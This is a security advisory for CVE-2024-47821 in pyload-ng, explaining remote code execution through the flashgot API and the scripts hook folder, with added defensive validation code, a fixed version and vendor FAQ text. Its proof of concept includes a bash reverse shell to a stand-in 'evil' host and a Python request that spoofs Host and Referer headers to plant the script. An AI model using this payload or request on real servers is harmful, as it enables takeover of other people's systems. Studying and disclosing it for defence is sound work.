Summary
The folder /.pyload/scripts (under the pyload user's home directory) contains subfolders whose scripts pyload runs when the corresponding event occurs, for example when a download finishes. By downloading an executable file into one of these subfolders and then triggering the matching event, remote code execution can be achieved. A file can be placed there by changing the download folder to a path under /scripts and using the /flashgot API to download the file into it.
Details
Configuration changes
- Change the download folder to /home/<user>/.pyload/scripts
- Change permissions for downloaded files:
  - Change permissions of downloads: on
  - Permission mode for downloaded files: 0744
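The weak setting above (a download folder inside the scripts tree) can be rejected at the point where the setting is saved. The following is an added example, not pyload's own code or its actual fix: a containment check that resolves both paths before comparing them, so symlinks, ".." segments and sibling names such as scripts2 do not fool it. The function names and the sample paths are assumptions.

```python
import os

# Added example, not pyload code. Paths below are constructed for illustration.


def is_inside(path: str, root: str) -> bool:
    """True if `path` resolves (symlinks and '..' included) to `root` or below.

    A plain startswith() check would accept '/x/scripts2' for root '/x/scripts';
    comparing with commonpath() on resolved paths does not.
    """
    real_path = os.path.realpath(path)
    real_root = os.path.realpath(root)
    try:
        return os.path.commonpath([real_path, real_root]) == real_root
    except ValueError:
        # commonpath raises when the paths are on different drives (Windows);
        # in that case the folder cannot be inside the scripts tree.
        return False


def validate_download_folder(download_folder: str, scripts_dir: str) -> str:
    """Refuse a download folder that would let downloaded files land in a hook folder."""
    if is_inside(download_folder, scripts_dir):
        raise ValueError(
            f"download folder {download_folder!r} lies inside the scripts directory {scripts_dir!r}"
        )
    return download_folder


# Constructed scenario: the pyload user's home is /home/user (assumption).
SCRIPTS_DIR = os.path.join("/home/user", ".pyload", "scripts")
SAFE_FOLDER = "/home/user/Downloads"
ATTACKER_FOLDER = os.path.join(SCRIPTS_DIR, "download_finished")
SNEAKY_FOLDER = "/home/user/Downloads/../.pyload/scripts/pre_download"


def evaluate_folders() -> dict:
    """Return which of the sample folders would be accepted."""
    return {
        name: not is_inside(folder, SCRIPTS_DIR)
        for name, folder in {
            "safe": SAFE_FOLDER,
            "attacker": ATTACKER_FOLDER,
            "sneaky": SNEAKY_FOLDER,
            "sibling": SCRIPTS_DIR + "2",
        }.items()
    }


if __name__ == "__main__":
    print(evaluate_folders())
```

Because the download folder can be changed again after it has been validated, the same check belongs at download time as well, applied to the final destination path of each file, not only in the settings handler.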
Making the request to download files
The flashgot API downloads files from a URL supplied in the request. Although pyload tries to prevent non-local requests from reaching this API, it does so by inspecting the Host header and the Referer header of the incoming request. Both are chosen by the client, so an attacker simply sets them to the expected values and passes both checks. The local_check decorator also accepts a loopback REMOTE_ADDR, but because its conditions are joined with "or", a spoofed Host header alone is sufficient.
Referer header check
import flask

def flashgot():
    # The Referer is supplied by the client; any HTTP client can set it to
    # exactly one of these two strings.
    if flask.request.referrer not in (
        "http://localhost:9666/flashgot",
        "http://127.0.0.1:9666/flashgot",
    ):
        flask.abort(500)
    ...
Host header check in the local_check decorator
from functools import wraps

import flask

def local_check(func):
    @wraps(func)
    def wrapper(*args, **kwargs):
        remote_addr = flask.request.environ.get("REMOTE_ADDR", "0")
        http_host = flask.request.environ.get("HTTP_HOST", "0")
        # REMOTE_ADDR comes from the socket, but HTTP_HOST is the client's Host
        # header; because of the "or", a spoofed Host header alone passes.
        if remote_addr in ("127.0.0.1", "::ffff:127.0.0.1", "::1", "localhost") or http_host in (
            "127.0.0.1:9666",
            "[::1]:9666",
        ):
            return func(*args, **kwargs)
        else:
            return "Forbidden", 403

    return wrapper
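The two checks above, reduced to pure functions over a WSGI-style environ dict so the bypass can be reproduced without a running pyload, next to a hardened variant that decides on the peer address alone. This is an added example, not pyload's code or its actual fix; the function names, the LOOPBACK set and the sample requests are assumptions.

```python
# Added example, not pyload code. Sample requests below are constructed.

LOOPBACK = {"127.0.0.1", "::ffff:127.0.0.1", "::1"}  # assumption: what "local" means


def local_check_vulnerable(environ: dict) -> bool:
    """Mirror of the advisory's local_check: accept if the peer address is loopback
    OR if the client-supplied Host header claims to be loopback."""
    remote_addr = environ.get("REMOTE_ADDR", "0")
    http_host = environ.get("HTTP_HOST", "0")
    return remote_addr in ("127.0.0.1", "::ffff:127.0.0.1", "::1", "localhost") or http_host in (
        "127.0.0.1:9666",
        "[::1]:9666",
    )


def referer_check_vulnerable(environ: dict) -> bool:
    """Mirror of the advisory's Referer check; the Referer is client-supplied."""
    return environ.get("HTTP_REFERER") in (
        "http://localhost:9666/flashgot",
        "http://127.0.0.1:9666/flashgot",
    )


def local_check_fixed(environ: dict) -> bool:
    """Hardened variant: only REMOTE_ADDR decides. It is filled in by the socket
    layer, not by the client, so Host and Referer are never consulted."""
    return environ.get("REMOTE_ADDR") in LOOPBACK


# Constructed requests: a remote attacker spoofing both headers, and a real local client.
SPOOFED = {
    "REMOTE_ADDR": "203.0.113.7",
    "HTTP_HOST": "127.0.0.1:9666",
    "HTTP_REFERER": "http://127.0.0.1:9666/flashgot",
}
GENUINE_LOCAL = {
    "REMOTE_ADDR": "127.0.0.1",
    "HTTP_HOST": "localhost:9666",
    "HTTP_REFERER": "http://localhost:9666/flashgot",
}


def evaluate(environ: dict) -> dict:
    """Does the request reach /flashgot under the vulnerable and the fixed gate?"""
    return {
        "vulnerable": local_check_vulnerable(environ) and referer_check_vulnerable(environ),
        "fixed": local_check_fixed(environ),
    }


if __name__ == "__main__":
    print("spoofed remote request:", evaluate(SPOOFED))
    print("genuine local request: ", evaluate(GENUINE_LOCAL))
```

Two caveats for the fixed variant. First, "localhost" can be dropped from the address tuple: REMOTE_ADDR is always an IP literal, so that entry never matches. Second, if pyload runs behind a reverse proxy on the same host, every client arrives with a loopback REMOTE_ADDR and an address-only gate admits everyone; the restriction then has to be enforced at the proxy, or the endpoint must require the same authentication and CSRF protection as the rest of the web interface.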
Once the file sits in one of the scripts subfolders, the attacker triggers the matching event (for example, completes another download) and pyload executes the script.
PoC
Create a malicious file. I have created a reverse shell:
#!/bin/bash
bash -i >& /dev/tcp/evil/9002 0>&1
Host this file at some URL, for example http://evil.
Create a request like this for the flashgot API. I am using the download_finished folder as the destination folder; scripts in this folder are run when a download is completed.
import requests

# Target pyload instance; the hostname is a placeholder for the PoC.
url = "http://pyload/flashgot"

# Both values are client-controlled. requests sends an explicit Host header
# as given instead of deriving it from the URL.
headers = {"host": "127.0.0.1:9666", "Referer": "http://127.0.0.1:9666/flashgot"}

data = {
    # The package name becomes a subfolder of the download folder, which is
    # now /home/<user>/.pyload/scripts, so the file lands in download_finished/.
    "package": "download_finished",
    "passwords": "optional_password",
    "urls": "http://evil/exp.sh",
    "autostart": 1,  # start the download immediately
}

response = requests.post(url, data=data, headers=headers)
print(response.status_code, response.text)
When the above request is made, exp.sh is downloaded to /scripts/download_finished. With the permission mode set to 0744 the file is executable, and from then on pyload runs it after every completed download. Sending the same request again triggers another download of the file, and when that download completes, the script is run.
I also have a listener on my machine which receives the connection from the pyload server. When the script executes, I get a connection back to my machine.
Screenshots (images not reproduced here): the download folder setting; exp.sh downloaded into the scripts folder; the script being run; the reverse shell connection being received.
Impact
This vulnerability allows an attacker with access to change the settings on a pyload server to execute arbitrary code and completely compromise the system.
Untrusted input reaches code that runs on the host: here the attacker-supplied download URL, combined with an attacker-chosen download folder, places a file in a hook directory that pyload then executes. Typical impact: code execution in the application's environment, as the user pyload runs as.
CVE-2024-47821 has a CVSS score of 9.1 (High). The vector is network-reachable, high privileges required (the attacker needs a pyload account that can change settings), and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.5.0b3.dev87); upgrading removes the vulnerable code path.
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2024-47821? CVE-2024-47821 is a high-severity OS command injection vulnerability in pyload-ng (pip), affecting versions < 0.5.0b3.dev87. It is fixed in 0.5.0b3.dev87. Untrusted input reaches a shell command, allowing arbitrary commands to run on the host.
- How severe is CVE-2024-47821? CVE-2024-47821 has a CVSS score of 9.1 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of pyload-ng are affected by CVE-2024-47821? pyload-ng (pip) versions < 0.5.0b3.dev87 are affected.
- Is there a fix for CVE-2024-47821? Yes. CVE-2024-47821 is fixed in 0.5.0b3.dev87. Upgrade to this version or later.
- Is CVE-2024-47821 exploitable, and should I be worried? Whether CVE-2024-47821 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
- What actually determines whether CVE-2024-47821 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2024-47821? Upgrade pyload-ng to 0.5.0b3.dev87 or later.